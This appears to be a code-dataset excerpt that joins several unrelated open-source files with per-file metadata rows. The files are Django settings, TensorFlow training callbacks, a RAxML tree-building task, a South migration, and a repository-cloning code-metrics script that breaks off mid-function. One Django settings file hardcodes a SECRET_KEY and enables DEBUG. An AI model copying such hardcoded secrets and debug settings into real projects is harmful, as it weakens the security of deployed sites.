'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
"static/",
)
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
BASE_URL = 'https://www.getdaze.org'
CONTACT_EMAIL = 'contact@getdaze.org'
WEIBO_URL = 'http://weibo.com/SHPMO'
CURRENT_PMO = 'pmo2020'
# Email settings
with open(os.path.join(DATA_DIR, 'secret_email.txt')) as f:
EMAIL_HOST, EMAIL_HOST_USER, EMAIL_HOST_PASSWORD = f.read().split()
EMAIL_PORT = 587
EMAIL_SUBJECT_PREFIX = '[%s] ' % CURRENT_PMO.upper()
EMAIL_USE_TLS = True
import pmo2015.helpers
CAPTCHA_CHALLENGE_FUNCT = pmo2015.helpers.word_challenge
CAPTCHA_IMAGE_SIZE = (300, 31)
PMO_LIST = {
'unknown': False,
'pmo2015': False,
'pmo2016': False,
'pmo2017': False,
'pmo2018': False,
'pmo2019': False,
'pmo2020': True
}
| gpl-2.0 | 441,406,430,976,898,240 | 24.090909 | 71 | 0.67029 | false | 3.241192 | false | false | false |
tensorflow/models | official/vision/image_classification/callbacks.py | 1 | 9323 | # Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Common modules for callbacks."""
from __future__ import absolute_import
from __future__ import division
# from __future__ import google_type_annotations
from __future__ import print_function
import os
from typing import Any, List, MutableMapping, Optional, Text
from absl import logging
import tensorflow as tf
from official.modeling import optimization
from official.utils.misc import keras_utils
def get_callbacks(
model_checkpoint: bool = True,
include_tensorboard: bool = True,
time_history: bool = True,
track_lr: bool = True,
write_model_weights: bool = True,
apply_moving_average: bool = False,
initial_step: int = 0,
batch_size: int = 0,
log_steps: int = 0,
model_dir: Optional[str] = None,
backup_and_restore: bool = False) -> List[tf.keras.callbacks.Callback]:
"""Get all callbacks."""
model_dir = model_dir or ''
callbacks = []
if model_checkpoint:
ckpt_full_path = os.path.join(model_dir, 'model.ckpt-{epoch:04d}')
callbacks.append(
tf.keras.callbacks.ModelCheckpoint(
ckpt_full_path, save_weights_only=True, verbose=1))
if backup_and_restore:
backup_dir = os.path.join(model_dir, 'tmp')
callbacks.append(
tf.keras.callbacks.experimental.BackupAndRestore(backup_dir))
if include_tensorboard:
callbacks.append(
CustomTensorBoard(
log_dir=model_dir,
track_lr=track_lr,
initial_step=initial_step,
write_images=write_model_weights,
profile_batch=0))
if time_history:
callbacks.append(
keras_utils.TimeHistory(
batch_size,
log_steps,
logdir=model_dir if include_tensorboard else None))
if apply_moving_average:
# Save moving average model to a different file so that
# we can resume training from a checkpoint
ckpt_full_path = os.path.join(model_dir, 'average',
'model.ckpt-{epoch:04d}')
callbacks.append(
AverageModelCheckpoint(
update_weights=False,
filepath=ckpt_full_path,
save_weights_only=True,
verbose=1))
callbacks.append(MovingAverageCallback())
return callbacks
def get_scalar_from_tensor(t: tf.Tensor) -> int:
"""Utility function to convert a Tensor to a scalar."""
t = tf.keras.backend.get_value(t)
if callable(t):
return t()
else:
return t
class CustomTensorBoard(tf.keras.callbacks.TensorBoard):
"""A customized TensorBoard callback that tracks additional datapoints.
Metrics tracked:
- Global learning rate
Attributes:
log_dir: the path of the directory where to save the log files to be parsed
by TensorBoard.
track_lr: `bool`, whether or not to track the global learning rate.
initial_step: the initial step, used for preemption recovery.
**kwargs: Additional arguments for backwards compatibility. Possible key is
`period`.
"""
# TODO(b/146499062): track params, flops, log lr, l2 loss,
# classification loss
def __init__(self,
log_dir: str,
track_lr: bool = False,
initial_step: int = 0,
**kwargs):
super(CustomTensorBoard, self).__init__(log_dir=log_dir, **kwargs)
self.step = initial_step
self._track_lr = track_lr
def on_batch_begin(self,
epoch: int,
logs: Optional[MutableMapping[str, Any]] = None) -> None:
self.step += 1
if logs is None:
logs = {}
logs.update(self._calculate_metrics())
super(CustomTensorBoard, self).on_batch_begin(epoch, logs)
def on_epoch_begin(self,
epoch: int,
logs: Optional[MutableMapping[str, Any]] = None) -> None:
if logs is None:
logs = {}
metrics = self._calculate_metrics()
logs.update(metrics)
for k, v in metrics.items():
logging.info('Current %s: %f', k, v)
super(CustomTensorBoard, self).on_epoch_begin(epoch, logs)
def on_epoch_end(self,
epoch: int,
logs: Optional[MutableMapping[str, Any]] = None) -> None:
if logs is None:
logs = {}
metrics = self._calculate_metrics()
logs.update(metrics)
super(CustomTensorBoard, self).on_epoch_end(epoch, logs)
def _calculate_metrics(self) -> MutableMapping[str, Any]:
logs = {}
# TODO(b/149030439): disable LR reporting.
# if self._track_lr:
# logs['learning_rate'] = self._calculate_lr()
return logs
def _calculate_lr(self) -> int:
"""Calculates the learning rate given the current step."""
return get_scalar_from_tensor(
self._get_base_optimizer()._decayed_lr(var_dtype=tf.float32)) # pylint:disable=protected-access
def _get_base_optimizer(self) -> tf.keras.optimizers.Optimizer:
"""Get the base optimizer used by the current model."""
optimizer = self.model.optimizer
# The optimizer might be wrapped by another class, so unwrap it
while hasattr(optimizer, '_optimizer'):
optimizer = optimizer._optimizer # pylint:disable=protected-access
return optimizer
class MovingAverageCallback(tf.keras.callbacks.Callback):
"""A Callback to be used with a `ExponentialMovingAverage` optimizer.
Applies moving average weights to the model during validation time to test
and predict on the averaged weights rather than the current model weights.
Once training is complete, the model weights will be overwritten with the
averaged weights (by default).
Attributes:
overwrite_weights_on_train_end: Whether to overwrite the current model
weights with the averaged weights from the moving average optimizer.
**kwargs: Any additional callback arguments.
"""
def __init__(self, overwrite_weights_on_train_end: bool = False, **kwargs):
super(MovingAverageCallback, self).__init__(**kwargs)
self.overwrite_weights_on_train_end = overwrite_weights_on_train_end
def set_model(self, model: tf.keras.Model):
super(MovingAverageCallback, self).set_model(model)
assert isinstance(self.model.optimizer,
optimization.ExponentialMovingAverage)
self.model.optimizer.shadow_copy(self.model)
def on_test_begin(self, logs: Optional[MutableMapping[Text, Any]] = None):
self.model.optimizer.swap_weights()
def on_test_end(self, logs: Optional[MutableMapping[Text, Any]] = None):
self.model.optimizer.swap_weights()
def on_train_end(self, logs: Optional[MutableMapping[Text, Any]] = None):
if self.overwrite_weights_on_train_end:
self.model.optimizer.assign_average_vars(self.model.variables)
class AverageModelCheckpoint(tf.keras.callbacks.ModelCheckpoint):
"""Saves and, optionally, assigns the averaged weights.
Taken from tfa.callbacks.AverageModelCheckpoint.
Attributes:
update_weights: If True, assign the moving average weights to the model, and
save them. If False, keep the old non-averaged weights, but the saved
model uses the average weights. See `tf.keras.callbacks.ModelCheckpoint`
for the other args.
"""
def __init__(self,
update_weights: bool,
filepath: str,
monitor: str = 'val_loss',
verbose: int = 0,
save_best_only: bool = False,
save_weights_only: bool = False,
mode: str = 'auto',
save_freq: str = 'epoch',
**kwargs):
self.update_weights = update_weights
super().__init__(filepath, monitor, verbose, save_best_only,
save_weights_only, mode, save_freq, **kwargs)
def set_model(self, model):
if not isinstance(model.optimizer, optimization.ExponentialMovingAverage):
raise TypeError('AverageModelCheckpoint is only used when training'
'with MovingAverage')
return super().set_model(model)
def _save_model(self, epoch, logs):
assert isinstance(self.model.optimizer,
optimization.ExponentialMovingAverage)
if self.update_weights:
self.model.optimizer.assign_average_vars(self.model.variables)
return super()._save_model(epoch, logs)
else:
# Note: `model.get_weights()` gives us the weights (non-ref)
# whereas `model.variables` returns references to the variables.
non_avg_weights = self.model.get_weights()
self.model.optimizer.assign_average_vars(self.model.variables)
# result is currently None, since `super._save_model` doesn't
# return anything, but this may change in the future.
result = super()._save_model(epoch, logs)
self.model.set_weights(non_avg_weights)
return result
| apache-2.0 | -1,199,922,158,997,506,300 | 35.276265 | 104 | 0.664486 | false | 3.958811 | false | false | false |
ninjahoahong/django-yaas | YAAS/settings.py | 1 | 5428 | # Django settings for YAAS project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('admin', 'admin@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'YAASdb.db', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'h3az0-*^)c!%ur(=_+a88ehr=uf9j$6**r1#1#-%j2h8_&w!c^'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'YAAS.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'YAAS.wsgi.application'
import os
TEMPLATE_DIRS = (os.path.join(os.path.dirname(__file__), '..', 'templates').replace('\\','/'),)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'YAASApp',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
| mit | 1,969,944,859,881,598,000 | 33.246753 | 108 | 0.660464 | false | 3.690007 | false | false | false |
jhcepas/npr | nprlib/task/raxml.py | 1 | 8790 | import os
import sys
import logging
import re
import shutil
from glob import glob
log = logging.getLogger("main")
from nprlib.master_task import TreeTask
from nprlib.master_job import Job
from nprlib.utils import (basename, Tree, OrderedDict,
GLOBALS, RAXML_CITE, pjoin, DATATYPES, md5)
from nprlib import db
__all__ = ["Raxml"]
class Raxml(TreeTask):
def __init__(self, nodeid, alg_file, constrain_id, model,
seqtype, conf, confname, parts_id=None):
GLOBALS["citator"].add(RAXML_CITE)
base_args = OrderedDict()
self.bootstrap = conf[confname].get("_bootstrap", None)
model = model or conf[confname]["_aa_model"]
self.confname = confname
self.conf = conf
self.alg_phylip_file = alg_file
try:
self.constrain_tree = db.get_dataid(constrain_id, DATATYPES.constrain_tree)
except ValueError:
self.constrain_tree = None
self.partitions_file = parts_id
TreeTask.__init__(self, nodeid, "tree", "RaxML",
base_args, conf[confname])
max_cores = GLOBALS["_max_cores"]
appname = conf[confname]["_app"]
if max_cores > 1:
threads = conf["threading"].get("raxml-pthreads")
if threads > 1:
appname = appname.replace("raxml", "raxml-pthreads")
raxml_bin = conf["app"][appname]
else:
appname = appname.replace("raxml-pthreads", "raxml")
threads = 1
raxml_bin = conf["app"][appname]
self.raxml_bin = raxml_bin
self.threads = threads
self.seqtype = seqtype
# Process raxml options
method = conf[confname].get("_method", "GAMMA").upper()
if seqtype.lower() == "aa":
self.model_string = 'PROT%s%s' %(method, model.upper())
self.model = model
elif seqtype.lower() == "nt":
self.model_string = 'GTR%s' %method
self.model = "GTR"
else:
raise ValueError("Unknown seqtype %s", seqtype)
#inv = conf[confname].get("pinv", "").upper()
#freq = conf[confname].get("ebf", "").upper()
self.init()
def load_jobs(self):
args = OrderedDict(self.args)
args["-s"] = pjoin(GLOBALS["input_dir"], self.alg_phylip_file)
args["-m"] = self.model_string
args["-n"] = self.alg_phylip_file
if self.constrain_tree:
log.log(24, "Using constrain tree %s" %self.constrain_tree)
args["-g"] = pjoin(GLOBALS["input_dir"], self.constrain_tree)
if self.partitions_file:
log.log(24, "Using alg partitions %s" %self.partitions_file)
args['-q'] = pjoin(GLOBALS["input_dir"], self.partitions_file)
tree_job = Job(self.raxml_bin, args, parent_ids=[self.nodeid])
tree_job.jobname += "-"+self.model_string
tree_job.cores = self.threads
# Register input files necessary to run the job
tree_job.add_input_file(self.alg_phylip_file)
if self.constrain_tree:
tree_job.add_input_file(self.constrain_tree)
if self.partitions_file:
tree_job.add_input_file(self.partitions_file)
self.jobs.append(tree_job)
self.out_tree_file = os.path.join(tree_job.jobdir,
"RAxML_bestTree." + self.alg_phylip_file)
if self.bootstrap == "alrt":
alrt_args = tree_job.args.copy()
if self.constrain_tree:
del alrt_args["-g"]
if self.partitions_file:
alrt_args["-q"] = args['-q']
alrt_args["-f"] = "J"
alrt_args["-t"] = self.out_tree_file
alrt_job = Job(self.raxml_bin, alrt_args,
parent_ids=[tree_job.jobid])
alrt_job.jobname += "-alrt"
alrt_job.dependencies.add(tree_job)
alrt_job.cores = self.threads
# Register necessary input files
alrt_job.add_input_file(self.alg_phylip_file)
if self.partitions_file:
alrt_job.add_input_file(self.partitions_file)
self.jobs.append(alrt_job)
self.alrt_job = alrt_job
elif self.bootstrap == "alrt_phyml":
alrt_args = {
"-o": "n",
"-i": self.alg_phylip_file,
"--bootstrap": "-2",
"-d": self.seqtype,
"-u": self.out_tree_file,
"--model": self.model,
"--quiet": "",
"--no_memory_check": "",
}
#if self.constrain_tree:
# alrt_args["--constraint_tree"] = self.constrain_tree
alrt_job = Job(self.conf["app"]["phyml"],
alrt_args, parent_ids=[tree_job.jobid])
alrt_job.add_input_file(self.alg_phylip_file, alrt_job.jobdir)
alrt_job.jobname += "-alrt"
alrt_job.dependencies.add(tree_job)
alrt_job.add_input_file(self.alg_phylip_file)
self.jobs.append(alrt_job)
self.alrt_job = alrt_job
else:
# Bootstrap calculation
boot_args = tree_job.args.copy()
boot_args["-n"] = "bootstraps."+boot_args["-n"]
boot_args["-N"] = int(self.bootstrap)
boot_args["-b"] = 31416
boot_job = Job(self.raxml_bin, boot_args,
parent_ids=[tree_job.jobid])
boot_job.jobname += "-%d-bootstraps" %(boot_args['-N'])
boot_job.dependencies.add(tree_job)
boot_job.cores = self.threads
# Register necessary input files
boot_job.add_input_file(self.alg_phylip_file)
if self.constrain_tree:
boot_job.add_input_file(self.constrain_tree)
if self.partitions_file:
boot_job.add_input_file(self.partitions_file)
self.jobs.append(boot_job)
# Bootstrap drawing on top of best tree
bootd_args = tree_job.args.copy()
if self.constrain_tree:
del bootd_args["-g"]
if self.partitions_file:
del bootd_args["-q"]
bootd_args["-n"] = "bootstrapped."+ tree_job.args["-n"]
bootd_args["-f"] = "b"
bootd_args["-t"] = self.out_tree_file
bootd_args["-z"] = pjoin(boot_job.jobdir, "RAxML_bootstrap." + boot_job.args["-n"])
bootd_job = Job(self.raxml_bin, bootd_args,
parent_ids=[tree_job.jobid])
bootd_job.jobname += "-bootstrapped"
bootd_job.dependencies.add(boot_job)
bootd_job.cores = self.threads
self.jobs.append(bootd_job)
self.boot_job = boot_job
self.bootd_job = bootd_job
def finish(self):
#first job is the raxml tree
def parse_alrt(match):
dist = match.groups()[0]
support = float(match.groups()[1])/100.0
return "%g:%s" %(support, dist)
if self.bootstrap == "alrt":
alrt_tree_file = os.path.join(self.alrt_job.jobdir,
"RAxML_fastTreeSH_Support." + self.alrt_job.args["-n"])
raw_nw = open(alrt_tree_file).read()
try:
nw, nsubs = re.subn(":(\d+\.\d+)\[(\d+)\]", parse_alrt, raw_nw, flags=re.MULTILINE)
except TypeError:
raw_nw = raw_nw.replace("\n","")
nw, nsubs = re.subn(":(\d+\.\d+)\[(\d+)\]", parse_alrt, raw_nw)
if nsubs == 0:
log.warning("alrt values were not detected in raxml tree!")
tree = Tree(nw)
elif self.bootstrap == "alrt_phyml":
alrt_tree_file = os.path.join(self.alrt_job.jobdir,
self.alg_phylip_file +"_phyml_tree.txt")
tree = Tree(alrt_tree_file)
else:
alrt_tree_file = os.path.join(self.bootd_job.jobdir,
"RAxML_bipartitions." + self.bootd_job.args["-n"])
nw = open(alrt_tree_file).read()
tree = Tree(nw)
tree.support = 100
for n in tree.traverse():
if n.support >1:
n.support /= 100.
else:
n.support = 0
TreeTask.store_data(self, tree.write(), {})
| gpl-3.0 | -4,085,692,445,470,686,700 | 37.384279 | 102 | 0.502958 | false | 3.632231 | false | false | false |
JoeJasinski/WindyTransit | mobiletrans/mtlocation/migrations/0002_auto__chg_field_location_uuid__chg_field_transitroute_uuid__chg_field_.py | 1 | 9992 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'Location.uuid'
db.alter_column(u'mtlocation_location', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=40))
# Changing field 'TransitRoute.uuid'
db.alter_column(u'mtlocation_transitroute', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=40))
# Changing field 'Region.uuid'
db.alter_column(u'mtlocation_region', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=40))
def backwards(self, orm):
# Changing field 'Location.uuid'
db.alter_column(u'mtlocation_location', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=36))
# Changing field 'TransitRoute.uuid'
db.alter_column(u'mtlocation_transitroute', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=36))
# Changing field 'Region.uuid'
db.alter_column(u'mtlocation_region', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=36))
models = {
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'mtlocation.gplace': {
'Meta': {'object_name': 'GPlace', '_ormbases': [u'mtlocation.Location']},
'address': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'international_phone_number': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'local_phone_number': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
u'location_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Location']", 'unique': 'True', 'primary_key': 'True'}),
'rating': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '4', 'decimal_places': '2', 'blank': 'True'}),
'reference': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}),
'types': ('mobiletrans.mtlocation.fields.SeparatedValuesField', [], {'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'vicinity': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'mtlocation.hospital': {
'Meta': {'object_name': 'Hospital', '_ormbases': [u'mtlocation.Location']},
u'location_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Location']", 'unique': 'True', 'primary_key': 'True'})
},
u'mtlocation.landmark': {
'Meta': {'object_name': 'Landmark', '_ormbases': [u'mtlocation.Location']},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'architect': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'build_date': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'landmark_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
u'location_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Location']", 'unique': 'True', 'primary_key': 'True'})
},
u'mtlocation.library': {
'Meta': {'object_name': 'Library', '_ormbases': [u'mtlocation.Location']},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'hours': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'location_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Location']", 'unique': 'True', 'primary_key': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'zip': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'})
},
u'mtlocation.location': {
'Meta': {'object_name': 'Location'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']", 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'point': ('django.contrib.gis.db.models.fields.PointField', [], {}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '255', 'populate_from': 'None', 'db_index': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
u'mtlocation.neighborhood': {
'Meta': {'object_name': 'Neighborhood', '_ormbases': [u'mtlocation.Region']},
'long_name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
u'region_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Region']", 'unique': 'True', 'primary_key': 'True'})
},
u'mtlocation.region': {
'Meta': {'object_name': 'Region'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'area': ('django.contrib.gis.db.models.fields.PolygonField', [], {}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']", 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '255', 'populate_from': 'None', 'db_index': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '40'})
},
u'mtlocation.transitroute': {
'Meta': {'object_name': 'TransitRoute'},
'color': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'long_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'route_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'short_name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'text_color': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.IntegerField', [], {}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'uuid': ('django.db.models.fields.CharField', [], {'max_length': '40', 'blank': 'True'})
},
u'mtlocation.transitstop': {
'Meta': {'object_name': 'TransitStop', '_ormbases': [u'mtlocation.Location']},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'location_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Location']", 'unique': 'True', 'primary_key': 'True'}),
'location_type': ('django.db.models.fields.IntegerField', [], {}),
'route': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['mtlocation.TransitRoute']", 'null': 'True', 'blank': 'True'}),
'stop_code': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'stop_id': ('django.db.models.fields.IntegerField', [], {'unique': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'mtlocation.zipcode': {
'Meta': {'object_name': 'Zipcode', '_ormbases': [u'mtlocation.Region']},
u'region_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['mtlocation.Region']", 'unique': 'True', 'primary_key': 'True'})
}
}
complete_apps = ['mtlocation']
| mit | 6,730,425,070,483,890,000 | 74.12782 | 177 | 0.560348 | false | 3.520789 | false | false | false |
jeppe-style/code-quality-and-popularity | static_code_metrics.py | 1 | 4112 | import json
import os
import subprocess
import git
import pandas
import shutil
from git import Repo
from shared_constants import data_dir, repo_candidates_filename
temp_repo_dir = "temp-repo"
code_metrics_file = "code-metrics.csv"
code_metrics_folder = "code-metrics"
def read_json(filename):
print("reading result from {}/{}".format(data_dir, filename))
with open("{}/{}.json".format(data_dir, filename), "r") as file:
data = json.load(file)
return data
def main():
# for all repos
candidate_repos = read_json(repo_candidates_filename)
# create the folder where to store the code metrics
if not os.path.exists("{}/{}".format(data_dir, code_metrics_folder)):
os.makedirs("{}/{}".format(data_dir, code_metrics_folder))
metrics = None
for i in range(0, len(candidate_repos)):
# for i in range(0, 10):
# create the folder where to store the repos temporarily
if not os.path.exists(temp_repo_dir):
os.makedirs(temp_repo_dir)
candidate_repo = candidate_repos[i]
# download repo
git_url = candidate_repo["html_url"]
repo_name = candidate_repo["name"]
print("============================================")
print("cloning repository {}".format(repo_name))
try:
Repo.clone_from(git_url, temp_repo_dir)
except git.exc.GitCommandError:
print("error cloning repository")
continue
# calculate code metrics on last snapshot
print("calculating code metrics")
repo_id = candidate_repo["id"]
output_file = "{}/{}/{}-{}".format(data_dir, code_metrics_folder, repo_id, code_metrics_file)
if not compute_metrics(output_file):
continue
temp_frame = prepare_metrics_data(candidate_repo, output_file, repo_id, repo_name)
if metrics is None:
metrics = temp_frame
else:
metrics = pandas.concat([metrics, temp_frame], ignore_index=True)
print("save data to csv")
metrics.to_csv("{}/final-{}".format(data_dir, code_metrics_file))
shutil.rmtree(temp_repo_dir)
def compute_metrics(output_file):
# e.g "Exception in thread "main" java.lang.NullPointerException..."
# java -jar ck/ck-0.2.1-SNAPSHOT-jar-with-dependencies.jar temp-repo/ data/36057260-code-metrics.csv
# subprocess.run("java -jar ck/ck-0.2.1-SNAPSHOT-jar-with-dependencies.jar {} {}"
# .format(temp_repo_dir, output_file), shell=True)
try:
subprocess.run(
" ".join(
["java", "-jar", "ck/ck-0.2.1-SNAPSHOT-jar-with-dependencies.jar", temp_repo_dir, output_file]
),
shell=True, check=True,
timeout=60 * 10
)
